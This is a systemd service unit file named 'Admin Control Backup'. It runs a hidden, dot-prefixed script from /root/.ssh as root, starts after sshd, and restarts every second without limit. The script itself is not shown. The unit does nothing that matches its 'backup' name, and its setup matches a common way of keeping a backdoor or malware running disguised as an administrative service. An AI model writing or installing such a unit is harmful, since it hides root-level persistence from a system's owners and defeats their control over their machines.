[Unit]
Description=Admin Control Backup
After=sshd.service
StartLimitIntervalSec=0

[Service]
Type=simple
Restart=always
RestartSec=1
User=root
ExecStart=/root/.ssh/.iron_biscotti.sh

[Install]
WantedBy=multi-user.target
